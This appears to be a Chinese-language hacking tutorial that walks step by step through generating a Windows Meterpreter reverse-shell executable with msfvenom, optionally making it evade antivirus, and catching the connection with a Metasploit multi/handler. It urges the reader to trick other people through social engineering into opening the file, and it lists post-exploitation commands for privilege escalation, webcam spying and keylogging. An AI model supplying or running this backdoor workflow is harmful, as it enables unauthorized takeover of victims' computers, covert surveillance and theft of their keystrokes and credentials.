msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o openme.exe

#本地监听地址及端口号：10.10.10.128：50000  

为生成的文件 openme.exe 赋予可执行的权限，如果有必要可以对该文件执行免杀

命令：

chmod 777 openme.exe 

打开msf，加载exploit/multi/handler模块，同时设置本地主机地址，本地端口

命令：

msfconsole  

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 10.10.10.128

msf exploit(handler) > set lport 50000

开始执行渗透攻击并监听

命令：

 msf exploit(handler) > exploit -z -j

此时，你可以将文件发给其他人，利用社会工程学知识让别人在他的win7系统上打开该文件，那么你的目的就达到了

下面就是我在win7虚拟机中的文件，然后运行该文件

后门程序反向连接到msf，msf发起第二次攻击（开始渗透），然后客户端（后门程序）连接到服务端（msf）。

如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell，还有session信息。

命令：

msf exploit(handler) > sessions

msf exploit(handler) > sessions -i 1

meterpreter > shell

最后恭喜你就这样hacked别人的win7系统，如果你进一步学习Windows系统下的命令行操作，你就可以随意控制别人的主机了。

下面附上meterpreter常用的命令

getsystem        #会自动利用各种各样的系统漏洞来进行权限提升

migrate          #进程id进程迁移

background       #把当前的会话设置为背景，需要的时候在启用

getuid          #查看对方正在运行的用户

ps   #列出所有的进程

getpid      #返回运行meterpreter的id号

sysinfo       #产看系统信息和体系结构

shell    #切换到cmd的系统权限方式

exit   #退出shell会话返回meterpreter或终止meterpreter

getdesktop截取目标主机当前桌面会话窗口

run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头

keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘